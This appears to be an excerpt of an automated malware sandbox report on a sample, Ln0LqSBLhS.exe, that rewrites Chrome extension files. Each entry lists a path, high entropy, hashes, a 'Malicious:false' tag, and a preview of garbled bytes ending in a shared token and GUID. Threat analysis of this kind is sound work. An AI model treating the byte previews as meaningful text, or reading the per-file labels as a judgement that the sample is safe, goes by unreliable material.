                                                                                                                                                                                                    Preview: -..0.aX.l.k..8.^.(.."].K7.......oo..7.._.N._.iy?..d;.LB.A.........T1J.6.#w..+.w.....f0$.hs[a......|.....y..8..5O../c.^5.U.*.ml......o....-...ku..Z..,....v.y..I.@..)..*.#...#..?8I.........3..$......2.$....P...TQ6vg....^..h...f~...S.....n..@.xp.n..V..q..?.D.....UD....#.[FQ...R..V.m.Xc/5..S..3.T.>";...$..X`...Z...).3.0...6CxRT..Q...M;...Qh.W5........a.....H.3.H...H......#A.s.b].....K..a.\....h.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1241
                                                                                                                                                                                                    Entropy (8bit):7.847598381122012
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:K8HIB+GuIDJSlKz9/Zt28bpywQFX31Nofcugqm5WaWWQ72lJ090bD:K8HItuEao9/Z88NFYX31+kvia27ISkD
                                                                                                                                                                                                    MD5:F72FBBB335E23CBED05898A251A88691
                                                                                                                                                                                                    SHA1:5CAAA999CF91C3244B91ECB108284E6C48E0B3D2
                                                                                                                                                                                                    SHA-256:1BA0EB8D1066BD1B1560404A2467B46A4C48376769182F221AA58B34680032F9
                                                                                                                                                                                                    SHA-512:03394A791426011D38254C0EDEA698EED5CC07B25F9191DF6381B7EAC0CCD7132CA128F7BE567DEABBEDDEB591F6C605C8A9B048310DFFA64D729F9BB44A4000
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .z...?g.*.^...3.MY..eM...Rh.zZ.Y..Iuk...w.P......Gm.#..;.k.vDv&.S...`g]..9WO.}6..>@....=..'.qXx...`M3...L...ST=...Y^..Y..EE.F.._e4w........Wd..)#F.e.<.<.ac.(..t..>.l..._+-.G~.....*~......c..Vz.).em.....(...S$.....j.C...)."c....G.B.]......z8.U.PFg..b.$.h...#N.}...R.(W&..[.+.<RH..(.+..':.pP..L*..AV?..e...J..p..p./b.N..x!Q..W....}.......7.....J.%....w......QF=?.I.W...._.^..9.........$.........^.+!@|.6.....H...&.*%.C...uDu.]....R3}.R..z...@..r....7...F1.<..VuL.n.fW..z.Wo.M.....i.v.Yb.;..Bj.......U.>G...^.....`'=5.U......V0.|T.2t.1.L........I....b.7. ....h_2.=..9...'.<.4..2@...t.T.W.....F..l....|..T..B.........X..H...Z...........;-...(......Z.6.........6....Q$Vu.x#.^.g.......K.gj.y.s..>6Y..........VA..n$..pEG`$ApJD.a.....F...'h....tn?.*I.9...5...S.._........ O.x.w.z..k......1...f.Dp......R=..[{.....l..S.......o...(.4..)$~..,.~...x.H.J,..........F3=.Z...e.>7..?.........C.ND.z..%.....p4..5..A7O..H...S..7.g..s."*..o..Jw....X...w<.s.,..n. .C.......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):468
                                                                                                                                                                                                    Entropy (8bit):7.365266178351505
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:OnAmfDm3cvU5UH/lqazoSNuqlhtPtHqKmyPTwcii9a:OzfDjNzzosPtRmETwbD
                                                                                                                                                                                                    MD5:37B6585EDF7CC894C3465CE3F857DD83
                                                                                                                                                                                                    SHA1:8A58173EB39B68AA4A3996F866C1B12F452BE97F
                                                                                                                                                                                                    SHA-256:63502D79934C3B621695EE4D4C87F115B88BE125AFFC4F4C4CA996ACF3F3341A
                                                                                                                                                                                                    SHA-512:F6FEEF84F8BCA01D5865EFF4BAAEB0566E369FDE890DF541586DA8BC54FE288466EF02B9728F7E5A29D56204A027869342A0983D5BA968CAC6BDCA5006783290
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .._..1W....n..{..../1.0...F...t..'.J..%.%x.P3.. ..4H`$.}.g...KnH..-o..._..]V.NK..........xT.e.[9YOsW\..M........,B7....?j.[...5.:.L.p..I....H....uk.Ov...W.M.q.Ti...7.-.Oc..xe.w.5......wi.[g.......c..6.......Z.w1..pr.TO....&..Gc...t3Jzu.6'i..n(k..5..V..M.q.3...L.nt~W.mI.nMO=.....t.._.~.D(..D.).s.iE;AA..N.......=Y...#.2N...E..c..N.9...Pm.C\.....q~.B..~.D*.FiCR..v.!5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ar\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):514
                                                                                                                                                                                                    Entropy (8bit):7.4629375671330065
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:B7dIVTFf7+8oUt9J0qRO7DfvbKZa2a/9M0Jmd1uf77cii9a:b4TFfKFiJ0dX2aSkmvu3bD
                                                                                                                                                                                                    MD5:35D2C3159E94451117A25832272FA4C1
                                                                                                                                                                                                    SHA1:0CD24C033B2431570FC9828D0B0EB15787D5D716
                                                                                                                                                                                                    SHA-256:C96DBFB8ABD37D7CB35647E793C64DD0B456E2482A5758B91E561D20AB6E52B9
                                                                                                                                                                                                    SHA-512:8B02A96ADDE773390652DFF757756923C2698A9ECD7FDA0DB7438811ECB781AA8C3E1814F79D114CD1B34CA10D2894C386571F2FCD49D59D5589C37EB4A77779
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: h......+#<....).Z..........b..9.....S.+.v....5.mM"..v..oE...7.q......IP......da..i....#.....*...M`&P.h...N..4.x...*......MYV.h..NN*..4....C...O....S+v..C.7..8O.A.W.R:..R&...l*..SC.l...3.(W..1....U...O..v5S......u.&.......1$...2...}.....-c.g..wV....v......3;2.`A..|.D.R...mi.G=d.g......Z._.m........x..k..U.H0;.D1...sZ...q;Z.|@E.O..I,....e.|.V...\..Ui}k.(e..../..v}....M`..1.k.0...]...7.{..a.]..L.......2.X.........X...)R5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\bg\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):517
                                                                                                                                                                                                    Entropy (8bit):7.514785381006682
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:rq5rWyPbeU1PHiQDvY3mYDPsFi9Hyd+wrG0ouoKAcii9a:rqvzemPCQM3fPsqH85iVvKAbD
                                                                                                                                                                                                    MD5:1B64CA6CA4890A89DA5B797E2BB66F11
                                                                                                                                                                                                    SHA1:8C16F81BD52BA8B89D922946C3F42C12FD66AD73
                                                                                                                                                                                                    SHA-256:022728A84553207DB49556A700047C69C68B58FC675085E9EA3E5605FEA483C6
                                                                                                                                                                                                    SHA-512:A0D6E9D70231EDFC5F6A06F607F3461EC3D7172DFC2814B74B0DB357B35DBF2E5B46D41697E8B37E646109B32177AAA3201664074031B88D180678724A8C6E6D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: (./-.hIVuC-..6...(.."iRE50....\...cdL\........+.7.+9.s..xcL.....R.Q...kWk.,.K..V..T>...TrS...4S&...K...o.tcJ....eM..]cj".(?F.4..16B@8.....q..@...q....u|]...`....."..'.E..Y........fi*.....e..4..[<..0........L.3y..K_iHL..VT........8LA{*o.g.R./e.#.0.S."./Cz....n.pM.%.S..r.t.C.h..4.Q[-|EK..6mu..Ew.=.a..c...e.?... ....H...o.M..(Q...:...Fr..m..O{.N.......C.......IO.:....Y.. .c.]*.<.....Y?.!.....T....Z?.9.'....1n.........u..b.B.T...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ca\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):463
                                                                                                                                                                                                    Entropy (8bit):7.4286812418866
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:o4KHet10SRUuUC6jzhD0XwxVu2Y+gHe+JsYlDyDZzbC6pHKxqXTami75dExcii9a:1KMWj1D0XeonpZ2bCwKcXpXcii9a
                                                                                                                                                                                                    MD5:ACA3EBC2F219F0C8B04760FC2D88255E
                                                                                                                                                                                                    SHA1:EECF0E27E7827A8B62A8544A73B3EF37E541F1F8
                                                                                                                                                                                                    SHA-256:133B7ABF7AB9A24BE7E75A85E549CC4F337F6897F9C55E648989EA5140454321
                                                                                                                                                                                                    SHA-512:BE4A2266690247710DF21C22015C685903828D83A5E59D1813E6786F569A665B78E3644B3EF12B3381E456831478A29A910FF71EA62324228859FB980139FF4A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: di.I.!..z_o.\Lo@./..U..^}8%+0."L.$....<|<.%...`.wh...a....%.y..C.2..G..........A.r.3A.[#w.}.4^..2......[..H^.u9<J.v.^.-....xme..a...uZ..D.-...)y.y..9K..........z36...QG..&.u.y....+$t......I..Uk.Xo.6'\..._.1......E.HPZ .h.8n.+....CP..v...w..f<l....6.z}."V......I....2.........%(2..3f.c....U...k...&......g..H.Y....|Q...|L..d..x..ms.?.......D.r.......o...x $K.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\cs\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):470
                                                                                                                                                                                                    Entropy (8bit):7.437287977809082
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:hDhbrbYnoJoiOb4sK/dvbowsr9Qkcii9a:zQ6fy4sEDDs5PbD
                                                                                                                                                                                                    MD5:C2C62F65C59A04BF10682B6E00B95DDD
                                                                                                                                                                                                    SHA1:D1397E3E0EE12AB2AD7B745CF2701212C53D675B
                                                                                                                                                                                                    SHA-256:6D5CEE11757293418D555E2B979F56ABB7E609A517E551AD8A1F7A5299B9445B
                                                                                                                                                                                                    SHA-512:0CB5953201B3EABC9ED51D033B4E2FCC730B8CF3C896B1B66D10699481DF20916163F5F9ED36BE1B4C661F1D823FC9F801DD35671A630EC9AD31D5361AF77295
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..z.{h.C.@.A.`..w....]..x....(P.j.$_.|..}.(7.PPq..#..!.....5....)9.J.....D.V..}.4....0.....U.........%f....V......U.6..Q.x"..u.:...;...>..........E8.Mf...i...{[._.x.6.Ex.....1VR?..k...U..,..j;.F.;....6.Y.t...Xs.<].'$...J...Sb(.._.....&6..4.m.I.b.?..=.I5....]z.....=.........z.....QY......`|..8<.....B]wBF..%F..o..%....)`U.#Uj....H..a.|fPw.c........q.`g=\....Y.f....=F...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):462
                                                                                                                                                                                                    Entropy (8bit):7.414370066731245
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8SyA/zfmEOJB/dtLhJ2QymXfuEEI7iB59pXcii9a:8SyeeHJBpJ2QymvucmbpXbD
                                                                                                                                                                                                    MD5:C3E119589B52E84AA27FF95B66866A03
                                                                                                                                                                                                    SHA1:217ECCD04039EFDD6F3E9120E26F57491E71F676
                                                                                                                                                                                                    SHA-256:08C9B896B423E2C301C3BD690E654D05AA189B5032367A734FEADC2612AC7EE0
                                                                                                                                                                                                    SHA-512:3EF06E61D4C577AFF5E0252A8F92C2A016B941FC87C432FF28F39A709B88C31369118B2DFBC1F819E71A7439E84043EC5261EF782862E2BE3F9A761B6F70B2C7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: n.l.l..C:)...*s.Lp.9).F~..B..:..b.X.G...5$rA].y..2...NU.........Je6'.[X..v0v5z.$.[..o._...oG.7.7#...^.%UL..i......E^|A.Q.G..!4jS.....K.n.....Tx.K)I.3<........D...Y#V......FF.....b...j...ur..B....5...cc.......,....e..n.y......xPg.ru.Q.c..c.^.....3..:.....Z.Z......e...x#P.Kfd9....7.7.k...!_U.sb..LTV..-.[.%U.m.3..P.3jb...%.o{.:...... `:ny........U....|QV.N...."sw.H.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\de\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):484
                                                                                                                                                                                                    Entropy (8bit):7.419081155337517
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:AoTPIAskGXuuHeUUu1PtMuWjTpjo/NCiw1Mxlc0c9QTHcii9a:NEJP7HeUUu5muWjT2rDeHMbD
                                                                                                                                                                                                    MD5:48ADEA4E7580F8B9A8EB884498C04F64
                                                                                                                                                                                                    SHA1:A067DC722B9EA3ED5EC709BE78F92BED1010F229
                                                                                                                                                                                                    SHA-256:C8E48BC4D8AA9FFCEF25214158D695C3130DE1E9DB6911D234249681DC2D15E3
                                                                                                                                                                                                    SHA-512:BC6CFC60C51AF1B09A33FC84A1DD4940E3FE44D2D078D0C48AC7BE2F9761FBDBED9215C5D9938A3F01F479B470B2A85FCBB89649B50D2CE2A3F6BE6E3168EDFB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Y4.I5ds.....h*-nt.e......y.X.}.K.j...D`.`.,7.#......._1.&...#25.$..._...@.H..:.T.0O.^A..9..fg.%T.....5..c.MS.W......9.C.To....E.y6.<.$..K...@.VY...!h..#Y....!........>.yL........?.....g-.1.k....n..mA*{c...e.R.....=....B.4X.>....v.B..#....=H....4,.=.BE...Z4..@......f.WV~..W.rd....*..$...../MLRb......i....D.........L.....w..Q..F.g:.Bvf|}...T}.:]`D.S.y.9,/.l..DH.W`M.O...z..R.:.}.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\el\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):523
                                                                                                                                                                                                    Entropy (8bit):7.5159970432595795
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:mvbqCuFupSTcyD51fbUUDv9ARqyWd8px4rLRvcii9a:mjqFkHyDD6RqS4LRvbD
                                                                                                                                                                                                    MD5:87A95D84578B780645E7DDBC30532BE1
                                                                                                                                                                                                    SHA1:287DC0D6FA0B1EFDD5CDA315BF538C9493E1C53A
                                                                                                                                                                                                    SHA-256:D819A011B85728C197C388AC8684F47B2C7F5265D366ECED6A0A571504D49411
                                                                                                                                                                                                    SHA-512:7FCFE16F07EFD357D7BC857BFF8EA17F13E45031486A02A6821202023BDD55E9E41084ADA83E31C509FCB6D11F672C1AD265B05CC6A1C334C0DA9519DE30A706
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: >...|E..oCB.."X.....Y.5....x..O.L.^Zu3G.).....!x.q...I.{.O..l..}...#..[.".).%..-..]).....^.9|M.P.)..V.Y..@.1.D..d`.Ej.>.v...('5|..M.|.}...4..]R..j.S.z..`t..P....1...V...............L.\.xa..}`..<....,...r.f.0.j.Cl...../.&.;...D$s@..[GO$.A.....i^G.^::.{..<..=!.+Y.Q...K2...H.D..8&n9\V..Ti.......\.B.^...Z..5U......$..$.#...|...A<)G........Z..7.N..J...s.1.h......3.r..o"M5......Zc{ .<...N.l.B)...'.p...7..B..W.<..F...`N..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_GB\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):459
                                                                                                                                                                                                    Entropy (8bit):7.443703557198001
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Omuz7q1VdNOIhSb/oFbR2afTuoSbM+8cu8jcjYYcii9a:OmHVPORjoFbPfxS6bYYbD
                                                                                                                                                                                                    MD5:F6D3F52768F2F23A97185F8B1119F0B0
                                                                                                                                                                                                    SHA1:FCA2B168F330F447A1FC06125A790825E914A75E
                                                                                                                                                                                                    SHA-256:3EBCA8B4A757BA27AD366F3737AAFDD180A7B830C3A043CCE119DA35A870D9CF
                                                                                                                                                                                                    SHA-512:F1CE7FC1916C4ACFA7C241446D38C0AB021BBC38140B136A52D0728C5586882A9C53802C4F885F4D88570E6FB582B712FE307B0D8E97E0EEF5D0B569B8B03A80
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Q~n$.%-......V5g..mv....n:..6.EV......Z....c(V....x..6.T.....Z+..<..}r....U.\.4C.M.ob.{....%.Z.f..BR.V.Z.*_..VM....d.D...P......d...vh.............8.O.+j.~@..|..f..8.f?....,..?.;..vgfM.#.e.b...K...)..JR|zK...S..&`..G.=/.h..f..hi9.h......U...3...@........W...7.[.Q. ...]..{80<..=e.c{Y6;.f.Pq..<..6..T.w....s............i.M....~..=W8.j...Rr....SV.!IR......8.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_US\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):537
                                                                                                                                                                                                    Entropy (8bit):7.5080569335032195
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:EGwF9HXywdWK28rW17c+TPhpC/5uPXx+cii9a:EH93ywbjrWxciPKOIbD
                                                                                                                                                                                                    MD5:94BFC92A09C18C270AB57960277035F9
                                                                                                                                                                                                    SHA1:0AF15221B3D222BFF82E744DBEDDF648874D8CAB
                                                                                                                                                                                                    SHA-256:8D271C3093D120E2541F7F89626F7D67930ABD923E6F8F1E60901BFB68E9697B
                                                                                                                                                                                                    SHA-512:032B5AA96CF3268D1F4F5A98F9B8648B32FDA049ADEA45C89913BF7232E9CA6A32769DE8A3172CA42FA878F333C77B38188873D9E3E41F35C694C2BD2566AACB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .%.=k.^.....q.B..P.d.....'.,...3..C...3..O.....%."n.).&....\..B. ...[cr....o..YHTW.,k<.Hbai...*.\..)s...U.L.2........O.&.{.. Z..ka.1C.....9.o:.b.].)..j....\Yg.OE(M$..Q3.............T..../..p..0i_.$.........X.....9, ...A?O...>I.......,.j... .&u..TC.z..&B.>....H2......h6.r.w........E.?zx....OT.HS....%..j...=$...b..l..@h.]VP.X...&F...Cd9*..B...p.-.&.p....z.nN4.yN...S$..-.,%..%-.pGAu.......}.,.+..Y.wqO....{..h.{.*.A)c......{..MnP+.0..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):467
                                                                                                                                                                                                    Entropy (8bit):7.504610776643177
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Kj1pEufADqHuCqL5j+/oNJAM4yE+vfLigK+gskcii9a:KR9Oqtqtj+e2byJvfLi5+pkbD
                                                                                                                                                                                                    MD5:82C3348F32B450D8AA380AA3BDC9CBC4
                                                                                                                                                                                                    SHA1:FA78C02BAE56930AE5AFC1E233EA5B2D3D116BA3
                                                                                                                                                                                                    SHA-256:75F016B52E2C8477EAFD9D17374F9CAF795A09B50AC91DD41A50BD60A33628C1
                                                                                                                                                                                                    SHA-512:E8B7B85F3FA0358F23BC823E8E3E72802B0224ECFABE4F0B3AFF098E6DC2C6A7C41326D419673A6C9DDCA0823DF002B45B9B45416F3311895855AACC8986B96C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .i.=>.q.......#...6."BM.....q1.b....`....l.3 .|..-AF.....;U_.?..7..O:...S....G.....{.._.u1....6.^.&....!..>9..........Z..X..b........d.{|.a....0lnKl./..."..@%..d.K...s.@..L....].6...U.m.K..........w&7...Q.F[.>...;{.j.`F!.cq.dG.8.`1.B....I.B"8ye........1...-.n...%...T.....m.?.hvMuxa.^.[C....i.e.}..P$E.K|.U..'....'.....Q..P.H....T.)...*..G.pQ.2......O\S..*.j...d.o.@U......{Y5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es_419\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):465
                                                                                                                                                                                                    Entropy (8bit):7.452807754693208
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Z3ANZFmp+zjmyELmX4BfJ/Cl/lGfZDZhkh3PMcUcii9a:ZWmp+zjTELmIBW8fZVqJtUbD
                                                                                                                                                                                                    MD5:E6A7FE45AE4D6F92455B92C0CDBE4B40
                                                                                                                                                                                                    SHA1:E31A400A138A006A2DE41697FC9CE203F66102BA
                                                                                                                                                                                                    SHA-256:216BA834EBE44958D814AF36CA0AE347236E700F354C3D21EEC7538B3B368FE6
                                                                                                                                                                                                    SHA-512:77D6DDD711B94E6951B57D94E78A65702EC9560E3C7093AE8EF31CC181C528013CD4F0EA18132EB523AA6C73C6329EB8D0605172940E013B10D6B90F130B9ED6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .1.h.o..&M3..@SO.M.=.D...k..p').Y..M....w....qe...;.q<.T"........?I.cCL?..$%.f.Y..'{f.......w).A9SW1.2.......7.[.A..a..&.J..._.{..mL.y.......r.o.F.c.-.}#.b.f..w.HI..Bi..~..DO~......0...k..0.W...O...o...._.n`....x.\.D'..w.[-.U......y.X....n..%u.r.u.\T.2j.`......@...........Q...E3m2...J...4)..o..2;..x.$uD1..$.!!..k..)H...3.I..q.......D........A..yq.......T.i.... x/5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\et\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):462
                                                                                                                                                                                                    Entropy (8bit):7.462497046913197
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:lTo56FUHbRgHSQ5vMTm0HjUkR99j5v4qkOcii9a:lE56OHbDQxSrHwU9FvkObD
                                                                                                                                                                                                    MD5:FA85AE07B98F29A75E4FDDD5A07655E9
                                                                                                                                                                                                    SHA1:D51C02D238FAF305904283D5F134B4CE7E63ABDC
                                                                                                                                                                                                    SHA-256:3AA1456D2DD1A0ACCA1B6885F5F48290B5A219B2B0AD7EB5A27FDEA89E02B01E
                                                                                                                                                                                                    SHA-512:51F5710B7750741A6C9CA7FF896DE87623233E01DEA7E37D4400D66BC1A89AFD35020A481FFFFDAE2339AD37EA771D9CA5B28C5082661FB3E3D79797B4836987
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: C....r.T.5..Y..|....O.cJ./........J...#I...2..=F}....Yo.o............>q....f.8..{v.... .D".~<.....0.9..w......<.T.F.~...T.".u.W......;:wg..T....I.9#y.2$....-B.,.W.f....E._.;..!.SeP..c.....8..pR...*....C&....vG...i..X[b....o7.._:.....`FD..U,jL...nY{....R}...z..v..a.....Z...0.6.....J.C..Qf.hM.1.c..Z.(....R.Cgmg..!..... .x..,...._.3|.....dT(....iU.gm/==..pnH...X.....P.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fi\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):456
                                                                                                                                                                                                    Entropy (8bit):7.4610771383587755
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:65BUMtCbXBRR1JBAhH+XEmSRRKr48mdtvzn61wcii9a:EClH1JKH+UjKr061wbD
                                                                                                                                                                                                    MD5:F6CD9E6E90CF3FD147E89B3AE3E258AE
                                                                                                                                                                                                    SHA1:AA399062164D7AFEACE25E3BA5265D5CEAA8F3CF
                                                                                                                                                                                                    SHA-256:84A00F7140DA7DE3A3558FD45E21E9DBF248763804390B252AF8C73F4267164E
                                                                                                                                                                                                    SHA-512:95B982F4A45F7668B03E135A2AEBA99D4E185DDA10AB9D8CEE0D81886E38CE86891BAFA1E826F26DCC95427E89D97F8E79FD44A429910491A47EC70B9DB09039
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
